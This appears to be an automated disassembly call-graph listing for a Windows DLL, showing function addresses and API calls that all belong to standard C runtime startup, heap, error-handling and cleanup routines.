6e0c46a7 12474->12484 12476 6e0c4423 __dosmaperr 14 API calls 12475->12476 12477 6e0c4698 12476->12477 12495 6e0c4366 12477->12495 12480 6e0c46a2 12481 6e0c471e 12481->12481 12516 6e0c3372 12481->12516 12483 6e0c478c 12485 6e0c4493 _free 14 API calls 12483->12485 12484->12481 12489 6e0c4797 12484->12489 12498 6e0c4872 12484->12498 12485->12489 12486 6e0c4783 12486->12483 12491 6e0c4867 12486->12491 12522 6e0c7441 12486->12522 12487 6e0c4853 12490 6e0c4493 _free 14 API calls 12487->12490 12489->12487 12492 6e0c4493 _free 14 API calls 12489->12492 12490->12480 12531 6e0c4376 IsProcessorFeaturePresent 12491->12531 12492->12489 12494 6e0c4871 12535 6e0c4302 12495->12535 12497 6e0c4372 12497->12480 12499 6e0c487e 12498->12499 12500 6e0c4436 __dosmaperr 14 API calls 12499->12500 12501 6e0c48ac 12500->12501 12502 6e0c7441 25 API calls 12501->12502 12503 6e0c48d8 12502->12503 12504 6e0c4376 __fassign 11 API calls 12503->12504 12505 6e0c4922 12504->12505 12543 6e0c4b7a 12505->12543 12517 6e0c3383 12516->12517 12521 6e0c33b5 12516->12521 12518 6e0c4436 __dosmaperr 14 API calls 12517->12518 12517->12521 12519 6e0c33ac 12518->12519 12520 6e0c4493 _free 14 API calls 12519->12520 12520->12521 12521->12486 12526 6e0c738e 12522->12526 12523 6e0c73a6 12524 6e0c73ba 12523->12524 12525 6e0c4423 __dosmaperr 14 API calls 12523->12525 12524->12486 12527 6e0c73b0 12525->12527 12526->12523 12526->12524 12529 6e0c73de 12526->12529 12528 6e0c4366 __fassign 25 API calls 12527->12528 12528->12524 12529->12524 12530 6e0c4423 __dosmaperr 14 API calls 12529->12530 12530->12527 12532 6e0c4382 12531->12532 12533 6e0c41ba __fassign 8 API calls 12532->12533 12534 6e0c4397 GetCurrentProcess TerminateProcess 12533->12534 12534->12494 12536 6e0c3fee __dosmaperr 14 API calls 12535->12536 12537 6e0c430d 12536->12537 12538 6e0c4376 __fassign 11 API calls 12537->12538 12540 6e0c431b 12537->12540 12539 6e0c4365 12538->12539 12541 6e0c4302 __fassign 25 API calls 12539->12541 12540->12497 12542 6e0c4372 12541->12542 12542->12497 12574 6e0c39bd 12543->12574 12575 6e0c39dd 12574->12575 12581 6e0c3e97 GetLastError 12575->12581 12582 6e0c3eae 12581->12582 12583 6e0c3eb4 12581->12583 12584 6e0c5be1 __dosmaperr 6 API calls 12582->12584 12585 6e0c5c20 __dosmaperr 6 API calls 12583->12585 12606 6e0c3eba SetLastError 12583->12606 12584->12583 12586 6e0c3ed2 12585->12586 12587 6e0c4436 __dosmaperr 14 API calls 12586->12587 12586->12606 12588 6e0c3ee2 12587->12588 12590 6e0c3eea 12588->12590 12591 6e0c3f01 12588->12591 12594 6e0c5c20 __dosmaperr 6 API calls 12590->12594 12596 6e0c5c20 __dosmaperr 6 API calls 12591->12596 12592 6e0c3f4e 12616 6e0c3979 12592->12616 12593 6e0c39fd 12608 6e0c69b6 12593->12608 12597 6e0c3ef8 12594->12597 12599 6e0c3f0d 12596->12599 12602 6e0c4493 _free 14 API calls 12597->12602 12600 6e0c3f11 12599->12600 12601 6e0c3f22 12599->12601 12603 6e0c5c20 __dosmaperr 6 API calls 12600->12603 12604 6e0c3c99 __dosmaperr 14 API calls 12601->12604 12602->12606 12603->12597 12605 6e0c3f2d 12604->12605 12607 6e0c4493 _free 14 API calls 12605->12607 12606->12592 12606->12593 12607->12606 12609 6e0c69c9 12608->12609 12610 6e0c3a13 12608->12610 12609->12610 12684 6e0c6dc4 12609->12684 12612 6e0c69e3 12610->12612 12613 6e0c69f6 12612->12613 12615 6e0c6a0b 12612->12615 12613->12615 12706 6e0c5402 12613->12706 12627 6e0c61ac 12616->12627 12619 6e0c3989 12621 6e0c39b2 12619->12621 12622 6e0c3993 IsProcessorFeaturePresent 12619->12622 12663 6e0c30ab 12621->12663 12623 6e0c399f 12622->12623 12657 6e0c41ba 12623->12657 12666 6e0c60de 12627->12666 12630 6e0c61f1 12631 6e0c61fd ___scrt_is_nonwritable_in_current_image 12630->12631 12632 6e0c3fee __dosmaperr 14 API calls 12631->12632 12635 6e0c622a __fassign 12631->12635 12638 6e0c6224 __fassign 12631->12638 12632->12638 12633 6e0c6271 12634 6e0c4423 __dosmaperr 14 API calls 12633->12634 12636 6e0c6276 12634->12636 12637 6e0c629d 12635->12637 12677 6e0c412a EnterCriticalSection 12635->12677 12639 6e0c4366 __fassign 25 API calls 12636->12639 12643 6e0c63d0 12637->12643 12645 6e0c62df 12637->12645 12654 6e0c630e 12637->12654 12638->12633 12638->12635 12641 6e0c625b 12638->12641 12639->12641 12641->12619 12646 6e0c63db 12643->12646 12682 6e0c4172 LeaveCriticalSection 12643->12682 12650 6e0c3e97 __fassign 37 API calls 12645->12650 12645->12654 12648 6e0c30ab __fassign 23 API calls 12646->12648 12649 6e0c63e3 12648->12649 12652 6e0c6303 12650->12652 12651 6e0c3e97 __fassign 37 API calls 12655 6e0c6363 12651->12655 12653 6e0c3e97 __fassign 37 API calls 12652->12653 12653->12654 12678 6e0c637d 12654->12678 12655->12641 12656 6e0c3e97 __fassign 37 API calls 12655->12656 12656->12641 12658 6e0c41d6 __DllMainCRTStartup@12 12657->12658 12659 6e0c4202 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12658->12659 12660 6e0c42d3 __DllMainCRTStartup@12 12659->12660 12661 6e0c0fe0 _ValidateLocalCookies 5 API calls 12660->12661 12662 6e0c42f1 12661->12662 12662->12621 12664 6e0c2f51 __DllMainCRTStartup@12 23 API calls 12663->12664 12665 6e0c30bc 12664->12665 12667 6e0c60ea ___scrt_is_nonwritable_in_current_image 12666->12667 12672 6e0c412a EnterCriticalSection 12667->12672 12669 6e0c60f8 12673 6e0c6136 12669->12673 12672->12669 12676 6e0c4172 LeaveCriticalSection 12673->12676 12675 6e0c397e 12675->12619 12675->12630 12676->12675 12677->12637 12679 6e0c6354 12678->12679 12680 6e0c6383 12678->12680 12679->12641 12679->12651 12679->12655 12683 6e0c4172 LeaveCriticalSection 12680->12683 12682->12646 12683->12679 12685 6e0c6dd0 ___scrt_is_nonwritable_in_current_image 12684->12685 12686 6e0c3e97 __fassign 37 API calls 12685->12686 12687 6e0c6dd9 12686->12687 12694 6e0c6e1f 12687->12694 12697 6e0c412a EnterCriticalSection 12687->12697 12689 6e0c6df7 12698 6e0c6e45 12689->12698 12694->12610 12695 6e0c3979 __fassign 37 API calls 12696 6e0c6e44 12695->12696 12697->12689 12699 6e0c6e08 12698->12699 12700 6e0c6e53 __fassign 12698->12700 12702 6e0c6e24 12699->12702 12700->12699 12701 6e0c6b78 __fassign 14 API calls 12700->12701 12701->12699 12705 6e0c4172 LeaveCriticalSection 12702->12705 12704 6e0c6e1b 12704->12694 12704->12695 12705->12704 12707 6e0c3e97 __fassign 37 API calls 12706->12707 12708 6e0c540c 12707->12708 12711 6e0c531a 12708->12711 12712 6e0c5326 ___scrt_is_nonwritable_in_current_image 12711->12712 12713 6e0c5340 12712->12713 12722 6e0c412a EnterCriticalSection 12712->12722 12715 6e0c5347 12713->12715 12718 6e0c3979 __fassign 37 API calls 12713->12718 12715->12615 12716 6e0c537c 12723 6e0c5399 12716->12723 12719 6e0c53b9 12718->12719 12720 6e0c5350 12720->12716 12721 6e0c4493 _free 14 API calls 12720->12721 12721->12716 12722->12720 12726 6e0c4172 LeaveCriticalSection 12723->12726 12725 6e0c53a0 12725->12713 12726->12725 12825 6e0c12c3 ___scrt_dllmain_exception_filter 13529 6e0c5d9c GetProcessHeap 13486 6e0c915f 13488 6e0c9168 13486->13488 13487 6e0c918f 13490 6e0c9e20 13487->13490 13493 6e0c9ef7 20 API calls 13487->13493 13488->13487 13489 6e0c920e 13488->13489 13491 6e0c9ef7 20 API calls 13489->13491 13492 6e0c921e 13491->13492 13494 6e0c9e1e 13493->13494 12925 6e0c6798 12926 6e0c66c7 ___scrt_uninitialize_crt 66 API calls 12925->12926 12927 6e0c67a0 12926->12927 12935 6e0c87a6 12927->12935 12929 6e0c67a5 12945 6e0c8851 12929->12945 12932 6e0c67cf 12933 6e0c4493 _free 14 API calls 12932->12933 12934 6e0c67da 12933->12934 12936 6e0c87b2 ___scrt_is_nonwritable_in_current_image 12935->12936 12949 6e0c412a EnterCriticalSection 12936->12949 12938 6e0c8829 12963 6e0c8848 12938->12963 12940 6e0c87bd 12940->12938 12942 6e0c87fd DeleteCriticalSection 12940->12942 12950 6e0c8edb 12940->12950 12944 6e0c4493 _free 14 API calls 12942->12944 12944->12940 12946 6e0c8868 12945->12946 12948 6e0c67b4 DeleteCriticalSection 12945->12948 12947 6e0c4493 _free 14 API calls 12946->12947 12946->12948 12947->12948 12948->12929 12948->12932 12949->12940 12951 6e0c8ee7 ___scrt_is_nonwritable_in_current_image 12950->12951 12952 6e0c8f06 12951->12952 12953 6e0c8ef1 12951->12953 12959 6e0c8f01 12952->12959 12966 6e0c67e4 EnterCriticalSection 12952->12966 12954 6e0c4423 __dosmaperr 14 API calls 12953->12954 12955 6e0c8ef6 12954->12955 12957 6e0c4366 __fassign 25 API calls 12955->12957 12957->12959 12958 6e0c8f23 12967 6e0c8e64 12958->12967 12959->12940 12961 6e0c8f2e 12983 6e0c8f55 12961->12983 13055 6e0c4172 LeaveCriticalSection 12963->13055 12965 6e0c8835 12965->12929 12966->12958 12968 6e0c8e86 12967->12968 12969 6e0c8e71 12967->12969 12972 6e0c661a ___scrt_uninitialize_crt 62 API calls 12968->12972 12975 6e0c8e81 12968->12975 12970 6e0c4423 __dosmaperr 14 API calls 12969->12970 12971 6e0c8e76 12970->12971 12973 6e0c4366 __fassign 25 API calls 12971->12973 12974 6e0c8e9b 12972->12974 12973->12975 12976 6e0c8851 14 API calls 12974->12976 12975->12961 12977 6e0c8ea3 12976->12977 12978 6e0c6a10 ___scrt_uninitialize_crt 25 API calls 12977->12978 12979 6e0c8ea9 12978->12979 12986 6e0c94d7 12979->12986 12982 6e0c4493 _free 14 API calls 12982->12975 13054 6e0c67f8 LeaveCriticalSection 12983->13054 12985 6e0c8f5d 12985->12959 12987 6e0c94e8 12986->12987 12992 6e0c94fd 12986->12992 12988 6e0c4410 __dosmaperr 14 API calls 12987->12988 12991 6e0c94ed 12988->12991 12989 6e0c9546 12990 6e0c4410 __dosmaperr 14 API calls 12989->12990 12993 6e0c954b 12990->12993 12994 6e0c4423 __dosmaperr 14 API calls 12991->12994 12992->12989 12995 6e0c9524 12992->12995 12996 6e0c4423 __dosmaperr 14 API calls 12993->12996 12998 6e0c8eaf 12994->12998 13001 6e0c944b 12995->13001 12999 6e0c9553 12996->12999 12998->12975 12998->12982 13000 6e0c4366 __fassign 25 API calls 12999->13000 13000->12998 13002 6e0c9457 ___scrt_is_nonwritable_in_current_image 13001->13002 13012 6e0c7aff EnterCriticalSection 13002->13012 13004 6e0c9465 13005 6e0c948c 13004->13005 13006 6e0c9497 13004->13006 13013 6e0c9564 13005->13013 13008 6e0c4423 __dosmaperr 14 API calls 13006->13008 13009 6e0c9492 13008->13009 13028 6e0c94cb 13009->13028 13012->13004 13031 6e0c7bd6 13013->13031 13015 6e0c957a 13044 6e0c7b45 13015->13044 13016 6e0c9574 13016->13015 13018 6e0c7bd6 ___scrt_uninitialize_crt 25 API calls 13016->13018 13027 6e0c95ac 13016->13027 13022 6e0c95a3 13018->13022 13019 6e0c7bd6 ___scrt_uninitialize_crt 25 API calls 13023 6e0c95b8 CloseHandle 13019->13023 13021 6e0c95f4 13021->13009 13025 6e0c7bd6 ___scrt_uninitialize_crt 25 API calls 13022->13025 13023->13015 13026 6e0c95c4 GetLastError 13023->13026 13024 6e0c43ed __dosmaperr 14 API calls 13024->13021 13025->13027 13026->13015 13027->13015 13027->13019 13053 6e0c7b22 LeaveCriticalSection 13028->13053 13030 6e0c94b4 13030->12998 13032 6e0c7bf8 13031->13032 13033 6e0c7be3 13031->13033 13035 6e0c4410 __dosmaperr 14 API calls 13032->13035 13037 6e0c7c1d 13032->13037 13034 6e0c4410 __dosmaperr 14 API calls 13033->13034 13036 6e0c7be8 13034->13036 13038 6e0c7c28 13035->13038 13039 6e0c4423 __dosmaperr 14 API calls 13036->13039 13037->13016 13040 6e0c4423 __dosmaperr 14 API calls 13038->13040 13041 6e0c7bf0 13039->13041 13042 6e0c7c30 13040->13042 13041->13016 13043 6e0c4366 __fassign 25 API calls 13042->13043 13043->13041 13045 6e0c7bbb 13044->13045 13046 6e0c7b54 13044->13046 13047 6e0c4423 __dosmaperr 14 API calls 13045->13047 13046->13045 13051 6e0c7b7e 13046->13051 13048 6e0c7bc0 13047->13048 13049 6e0c4410 __dosmaperr 14 API calls 13048->13049 13050 6e0c7bab 13049->13050 13050->13021 13050->13024 13051->13050 13052 6e0c7ba5 SetStdHandle 13051->13052 13052->13050 13053->13030 13054->12985 13055->12965 12462 6e0c7259 12465 6e0c6eee 12462->12465 12463 6e0c0fe0 _ValidateLocalCookies 5 API calls 12464 6e0c6efb 12463->12464 12465->12463 12358 6e0c66d0 12359 6e0c66dd 12358->12359 12360 6e0c4436 __dosmaperr 14 API calls 12359->12360 12361 6e0c66f7 12360->12361 12362 6e0c4493 _free 14 API calls 12361->12362 12363 6e0c6703 12362->12363 12364 6e0c6729 12363->12364 12365 6e0c4436 __dosmaperr 14 API calls 12363->12365 12369 6e0c6735 12364->12369 12370 6e0c5c62 12364->12370 12366 6e0c671d 12365->12366 12368 6e0c4493 _free 14 API calls 12366->12368 12368->12364 12371 6e0c5a81 __dosmaperr 5 API calls 12370->12371 12372 6e0c5c7e 12371->12372 12373 6e0c5c9c InitializeCriticalSectionAndSpinCount 12372->12373 12374 6e0c5c87 12372->12374 12373->12374 12374->12364 12466 6e0c9650 12469 6e0c966e 12466->12469 12468 6e0c9666 12473 6e0c9673 12469->12473 12470 6e0c9f33 15 API calls 12472 6e0c989f 12470->12472 12471 6e0c9708 12471->12468 12472->12468 12473->12470 12473->12471 13346 6e0c7490 13349 6e0c74a7 13346->13349 13348 6e0c74a2 13350 6e0c74c9 13349->13350 13351 6e0c74b5 13349->13351 13353 6e0c74d1 13350->13353 13354 6e0c74e3 13350->13354 13352 6e0c4423 __dosmaperr 14 API calls 13351->13352 13355 6e0c74ba 13352->13355 13356 6e0c4423 __dosmaperr 14 API calls 13353->13356 13357 6e0c39bd __fassign 37 API calls 13354->13357 13360 6e0c74e1 13354->13360 13358 6e0c4366 __fassign 25 API calls 13355->13358 13359 6e0c74d6 13356->13359 13357->13360 13361 6e0c74c5 13358->13361 13362 6e0c4366 __fassign 25 API calls 13359->13362 13360->13348 13361->13348 13362->13360 13461 6e0c9111 13462 6e0c9131 13461->13462 13465 6e0c9168 13462->13465 13464 6e0c915b 13466 6e0c916f 13465->13466 13467 6e0c920e 13466->13467 13471 6e0c918f 13466->13471 13469 6e0c9ef7 20 API calls 13467->13469 13468 6e0c9e20 13468->13464 13470 6e0c921e 13469->13470 13470->13464 13471->13464 13471->13468 13472 6e0c9ef7 20 API calls 13471->13472 13473 6e0c9e1e 13472->13473 13473->13464 13056 6e0c37ad 13059 6e0c3833 13056->13059 13060 6e0c37c0 13059->13060 13061 6e0c3847 13059->13061 13061->13060 13062 6e0c4493 _free 14 API calls 13061->13062 13062->13060 13304 6e0c4c6d 13305 6e0c4c7f 13304->13305 13306 6e0c4c7b 13304->13306 13307 6e0c4caa 13305->13307 13308 6e0c4c84 13305->13308 13307->13306 13315 6e0c58ff 13307->13315 13309 6e0c4436 __dosmaperr 14 API calls 13308->13309 13310 6e0c4c8d 13309->13310 13312 6e0c4493 _free 14 API calls 13310->13312 13312->13306 13313 6e0c4cca 13314 6e0c4493 _free 14 API calls 13313->13314 13314->13306 13316 6e0c590c 13315->13316 13317 6e0c5927 13315->13317 13316->13317 13318 6e0c5918 13316->13318 13321 6e0c5936 13317->13321 13324 6e0c7899 13317->13324 13319 6e0c4423 __dosmaperr 14 API calls 13318->13319 13323 6e0c591d __DllMainCRTStartup@12 13319->13323 13331 6e0c78cc 13321->13331 13323->13313 13325 6e0c78b9 HeapSize 13324->13325 13326 6e0c78a4 13324->13326 13325->13321 13327 6e0c4423 __dosmaperr 14 API calls 13326->13327 13328 6e0c78a9 13327->13328 13329 6e0c4366 __fassign 25 API calls 13328->13329 13330 6e0c78b4 13329->13330 13330->13321 13332 6e0c78d9 13331->13332 13333 6e0c78e4 13331->13333 13334 6e0c680c 15 API calls 13332->13334 13335 6e0c78ec 13333->13335 13341 6e0c78f5 __dosmaperr 13333->13341 13340 6e0c78e1 13334->13340 13338 6e0c4493 _free 14 API calls 13335->13338 13336 6e0c791f HeapReAlloc 13336->13340 13336->13341 13337 6e0c78fa 13339 6e0c4423 __dosmaperr 14 API calls 13337->13339 13338->13340 13339->13340 13340->13323 13341->13336 13341->13337 13342 6e0c6055 __dosmaperr 2 API calls 13341->13342 13342->13341 11578 6e0c132e 11579 6e0c133c 11578->11579 11580 6e0c1337 11578->11580 11584 6e0c11f8 11579->11584 11599 6e0c14c0 11580->11599 11586 6e0c1204 ___scrt_is_nonwritable_in_current_image 11584->11586 11585 6e0c122d dllmain_raw 11588 6e0c1247 dllmain_crt_dispatch 11585->11588 11595 6e0c1213 11585->11595 11586->11585 11587 6e0c1228 11586->11587 11586->11595 11603 6e0c0850 11587->11603 11588->11587 11588->11595 11591 6e0c1299 11592 6e0c12a2 dllmain_crt_dispatch 11591->11592 11591->11595 11593 6e0c12b5 dllmain_raw 11592->11593 11592->11595 11593->11595 11594 6e0c0850 __DllMainCRTStartup@12 5 API calls 11596 6e0c1280 11594->11596 11607 6e0c1148 11596->11607 11598 6e0c128e dllmain_raw 11598->11591 11600 6e0c14d6 11599->11600 11602 6e0c14df 11600->11602 11932 6e0c1473 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11600->11932 11602->11579 11604 6e0c087b 11603->11604 11634 6e0c0fe0 11604->11634 11606 6e0c0eb2 11606->11591 11606->11594 11609 6e0c1154 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11607->11609 11608 6e0c115d 11608->11598 11609->11608 11610 6e0c1185 11609->11610 11611 6e0c11f0 11609->11611 11642 6e0c165b 11610->11642 11663 6e0c182a IsProcessorFeaturePresent 11611->11663 11614 6e0c118a 11651 6e0c1517 11614->11651 11616 6e0c11f7 ___scrt_is_nonwritable_in_current_image 11617 6e0c122d dllmain_raw 11616->11617 11619 6e0c1228 11616->11619 11630 6e0c1213 11616->11630 11620 6e0c1247 dllmain_crt_dispatch 11617->11620 11617->11630 11618 6e0c118f __RTC_Initialize __DllMainCRTStartup@12 11654 6e0c17fc 11618->11654 11623 6e0c0850 __DllMainCRTStartup@12 5 API calls 11619->11623 11620->11619 11620->11630 11625 6e0c1268 11623->11625 11626 6e0c1299 11625->11626 11629 6e0c0850 __DllMainCRTStartup@12 5 API calls 11625->11629 11627 6e0c12a2 dllmain_crt_dispatch 11626->11627 11626->11630 11628 6e0c12b5 dllmain_raw 11627->11628 11627->11630 11628->11630 11631 6e0c1280 11629->11631 11630->11598 11632 6e0c1148 __DllMainCRTStartup@12 79 API calls 11631->11632 11633 6e0c128e dllmain_raw 11632->11633 11633->11626 11635 6e0c0fe8 11634->11635 11636 6e0c0fe9 IsProcessorFeaturePresent 11634->11636 11635->11606 11638 6e0c138e 11636->11638 11641 6e0c1351 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11638->11641 11640 6e0c1471 11640->11606 11641->11640 11643 6e0c1660 ___scrt_release_startup_lock 11642->11643 11644 6e0c1664 11643->11644 11647 6e0c1670 __DllMainCRTStartup@12 11643->11647 11667 6e0c36ee 11644->11667 11648 6e0c167d 11647->11648 11670 6e0c2f51 11647->11670 11648->11614 11804 6e0c248e InterlockedFlushSList 11651->11804 11655 6e0c1808 11654->11655 11656 6e0c11ae 11655->11656 11811 6e0c3886 11655->11811 11660 6e0c11ea 11656->11660 11658 6e0c1816 11816 6e0c24e6 11658->11816 11915 6e0c167e 11660->11915 11664 6e0c1840 __DllMainCRTStartup@12 11663->11664 11665 6e0c18eb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11664->11665 11666 6e0c1936 __DllMainCRTStartup@12 11665->11666 11666->11616 11681 6e0c35b9 11667->11681 11671 6e0c2f5f 11670->11671 11679 6e0c2f70 11670->11679 11752 6e0c2ff7 GetModuleHandleW 11671->11752 11676 6e0c2faa 11676->11614 11759 6e0c2e17 11679->11759 11682 6e0c35c5 ___scrt_is_nonwritable_in_current_image 11681->11682 11689 6e0c412a EnterCriticalSection 11682->11689 11684 6e0c35d3 11690 6e0c3614 11684->11690 11689->11684 11691 6e0c3633 11690->11691 11692 6e0c35e0 11690->11692 11691->11692 11697 6e0c4493 11691->11697 11694 6e0c3608 11692->11694 11751 6e0c4172 LeaveCriticalSection 11694->11751 11696 6e0c166e 11696->11614 11698 6e0c449e HeapFree 11697->11698 11699 6e0c44c7 __dosmaperr 11697->11699 11698->11699 11700 6e0c44b3 11698->11700 11699->11692 11703 6e0c4423 11700->11703 11706 6e0c3fee GetLastError 11703->11706 11705 6e0c4428 GetLastError 11705->11699 11707 6e0c4005 11706->11707 11708 6e0c400b 11706->11708 11729 6e0c5be1 11707->11729 11726 6e0c4011 SetLastError 11708->11726 11734 6e0c5c20 11708->11734 11715 6e0c4058 11717 6e0c5c20 __dosmaperr 6 API calls 11715->11717 11716 6e0c4041 11718 6e0c5c20 __dosmaperr 6 API calls 11716->11718 11719 6e0c4064 11717->11719 11720 6e0c404f 11718->11720 11721 6e0c4068 11719->11721 11722 6e0c4079 11719->11722 11723 6e0c4493 _free 12 API calls 11720->11723 11724 6e0c5c20 __dosmaperr 6 API calls 11721->11724 11746 6e0c3c99 11722->11746 11723->11726 11724->11720 11726->11705 11728 6e0c4493 _free 12 API calls 11728->11726 11730 6e0c5a81 __dosmaperr 5 API calls 11729->11730 11731 6e0c5bfd 11730->11731 11732 6e0c5c18 TlsGetValue 11731->11732 11733 6e0c5c06 11731->11733 11733->11708 11735 6e0c5a81 __dosmaperr 5 API calls 11734->11735 11736 6e0c5c3c 11735->11736 11737 6e0c5c5a TlsSetValue 11736->11737 11738 6e0c4029 11736->11738 11738->11726 11739 6e0c4436 11738->11739 11745 6e0c4443 __dosmaperr 11739->11745 11740 6e0c4483 11742 6e0c4423 __dosmaperr 13 API calls 11740->11742 11741 6e0c446e RtlAllocateHeap 11743 6e0c4039 11741->11743 11741->11745 11742->11743 11743->11715 11743->11716 11744 6e0c6055 __dosmaperr EnterCriticalSection LeaveCriticalSection 11744->11745 11745->11740 11745->11741 11745->11744 11747 6e0c3b2d __dosmaperr EnterCriticalSection LeaveCriticalSection 11746->11747 11748 6e0c3d07 11747->11748 11749 6e0c3c3f __dosmaperr 14 API calls 11748->11749 11750 6e0c3d30 11749->11750 11750->11728 11751->11696 11753 6e0c2f64 11752->11753 11753->11679 11754 6e0c303a GetModuleHandleExW 11753->11754 11755 6e0c3059 GetProcAddress 11754->11755 11758 6e0c306e 11754->11758 11755->11758 11756 6e0c308b 11756->11679 11757 6e0c3082 FreeLibrary 11757->11756 11758->11756 11758->11757 11760 6e0c2e23 ___scrt_is_nonwritable_in_current_image 11759->11760 11775 6e0c412a EnterCriticalSection 11760->11775 11762 6e0c2e2d 11776 6e0c2e64 11762->11776 11764 6e0c2e3a 11780 6e0c2e58 11764->11780 11767 6e0c2fb5 11784 6e0c4189 GetPEB 11767->11784 11770 6e0c2fe4 11772 6e0c303a __DllMainCRTStartup@12 3 API calls 11770->11772 11771 6e0c2fc4 GetPEB 11771->11770 11773 6e0c2fd4 GetCurrentProcess TerminateProcess 11771->11773 11774 6e0c2fec ExitProcess 11772->11774 11773->11770 11775->11762 11777 6e0c2e70 ___scrt_is_nonwritable_in_current_image 11776->11777 11778 6e0c2ed1 __DllMainCRTStartup@12 11777->11778 11779 6e0c36ee __DllMainCRTStartup@12 14 API calls 11777->11779 11778->11764 11779->11778 11783 6e0c4172 LeaveCriticalSection 11780->11783 11782 6e0c2e46 11782->11676 11782->11767 11783->11782 11785 6e0c2fbf 11784->11785 11786 6e0c41a3 11784->11786 11785->11770 11785->11771 11788 6e0c5b04 11786->11788 11791 6e0c5a81 11788->11791 11790 6e0c5b20 11790->11785 11792 6e0c5aaf 11791->11792 11796 6e0c5aab __dosmaperr 11791->11796 11792->11796 11797 6e0c59ba 11792->11797 11795 6e0c5ac9 GetProcAddress 11795->11796 11796->11790 11802 6e0c59cb ___vcrt_InitializeCriticalSectionEx 11797->11802 11798 6e0c5a76 11798->11795 11798->11796 11799 6e0c59e9 LoadLibraryExW 11800 6e0c5a04 GetLastError 11799->11800 11799->11802 11800->11802 11801 6e0c5a5f FreeLibrary 11801->11802 11802->11798 11802->11799 11802->11801 11803 6e0c5a37 LoadLibraryExW 11802->11803 11803->11802 11805 6e0c249e 11804->11805 11806 6e0c1521 11804->11806 11805->11806 11808 6e0c3904 11805->11808 11806->11618 11809 6e0c4493 _free 14 API calls 11808->11809 11810 6e0c391c 11809->11810 11810->11805 11812 6e0c3891 11811->11812 11813 6e0c38a3 ___scrt_uninitialize_crt 11811->11813 11814 6e0c389f 11812->11814 11822 6e0c66c7 11812->11822 11813->11658 11814->11658 11817 6e0c24ef 11816->11817 11818 6e0c24f9 11816->11818 11888 6e0c28cc 11817->11888 11818->11656 11825 6e0c6575 11822->11825 11828 6e0c64c9 11825->11828 11829 6e0c64d5 ___scrt_is_nonwritable_in_current_image 11828->11829 11836 6e0c412a EnterCriticalSection 11829->11836 11831 6e0c654b 11845 6e0c6569 11831->11845 11835 6e0c64df ___scrt_uninitialize_crt 11835->11831 11837 6e0c643d 11835->11837 11836->11835 11838 6e0c6449 ___scrt_is_nonwritable_in_current_image 11837->11838 11848 6e0c67e4 EnterCriticalSection 11838->11848 11840 6e0c6453 ___scrt_uninitialize_crt 11841 6e0c648c 11840->11841 11849 6e0c667f 11840->11849 11859 6e0c64bd 11841->11859 11887 6e0c4172 LeaveCriticalSection 11845->11887 11847 6e0c6557 11847->11814 11848->11840 11850 6e0c668c 11849->11850 11851 6e0c6695 11849->11851 11852 6e0c6575 ___scrt_uninitialize_crt 66 API calls 11850->11852 11862 6e0c661a 11851->11862 11858 6e0c6692 11852->11858 11856 6e0c66b1 11875 6e0c7ce2 11856->11875 11858->11841 11886 6e0c67f8 LeaveCriticalSection 11859->11886 11861 6e0c64ab 11861->11835 11863 6e0c6632 11862->11863 11867 6e0c6657 11862->11867 11864 6e0c6a10 ___scrt_uninitialize_crt 25 API calls 11863->11864 11863->11867 11865 6e0c6650 11864->11865 11866 6e0c84da ___scrt_uninitialize_crt 62 API calls 11865->11866 11866->11867 11867->11858 11868 6e0c6a10 11867->11868 11869 6e0c6a1c 11868->11869 11870 6e0c6a31 11868->11870 11871 6e0c4423 __dosmaperr 14 API calls 11869->11871 11870->11856 11872 6e0c6a21 11871->11872 11873 6e0c4366 __fassign 25 API calls 11872->11873 11874 6e0c6a2c 11873->11874 11874->11856 11876 6e0c7cf3 11875->11876 11880 6e0c7d00 11875->11880 11877 6e0c4423 __dosmaperr 14 API calls 11876->11877 11882 6e0c7cf8 11877->11882 11878 6e0c7d49 11879 6e0c4423 __dosmaperr 14 API calls 11878->11879 11881 6e0c7d4e 11879->11881 11880->11878 11883 6e0c7d27 11880->11883 11884 6e0c4366 __fassign 25 API calls 11881->11884 11882->11858 11885 6e0c7c40 ___scrt_uninitialize_crt 29 API calls 11883->11885 11884->11882 11885->11882 11886->11861 11887->11847 11889 6e0c24f4 11888->11889 11890 6e0c28d6 11888->11890 11892 6e0c2923 11889->11892 11896 6e0c2aa1 11890->11896 11893 6e0c294d 11892->11893 11894 6e0c292e 11892->11894 11893->11818 11895 6e0c2938 DeleteCriticalSection 11894->11895 11895->11893 11895->11895 11901 6e0c2a1d 11896->11901 11899 6e0c2ad3 TlsFree 11900 6e0c2ac7 11899->11900 11900->11889 11902 6e0c2a35 11901->11902 11903 6e0c2a58 11901->11903 11902->11903 11907 6e0c2983 11902->11907 11903->11899 11903->11900 11906 6e0c2a4a GetProcAddress 11906->11903 11913 6e0c298f ___vcrt_InitializeCriticalSectionEx 11907->11913 11908 6e0c2a03 11908->11903 11908->11906 11909 6e0c29a5 LoadLibraryExW 11910 6e0c2a0a 11909->11910 11911 6e0c29c3 GetLastError 11909->11911 11910->11908 11912 6e0c2a12 FreeLibrary 11910->11912 11911->11913 11912->11908 11913->11908 11913->11909 11914 6e0c29e5 LoadLibraryExW 11913->11914 11914->11910 11914->11913 11920 6e0c38b6 11915->11920 11918 6e0c28cc ___vcrt_uninitialize_ptd 6 API calls 11919 6e0c11ef 11918->11919 11919->11608 11923 6e0c40cf 11920->11923 11924 6e0c40d9 11923->11924 11926 6e0c1685 11923->11926 11927 6e0c5ba2 11924->11927 11926->11918 11928 6e0c5a81 __dosmaperr 5 API calls 11927->11928 11929 6e0c5bbe 11928->11929 11930 6e0c5bd9 TlsFree 11929->11930 11931 6e0c5bc7 11929->11931 11931->11926 11932->11602 11933 6e0c0fee 11934 6e0c102c 11933->11934 11935 6e0c0ff9 11933->11935 11938 6e0c1148 __DllMainCRTStartup@12 84 API calls 11934->11938 11936 6e0c101e 11935->11936 11937 6e0c0ffe 11935->11937 11945 6e0c1041 11936->11945 11939 6e0c1014 11937->11939 11941 6e0c1003 11937->11941 11944 6e0c1008 11938->11944 11964 6e0c15fb 11939->11964 11941->11944 11959 6e0c161a 11941->11959 11946 6e0c104d ___scrt_is_nonwritable_in_current_image 11945->11946 11972 6e0c168b 11946->11972 11948 6e0c1054 __DllMainCRTStartup@12 11949 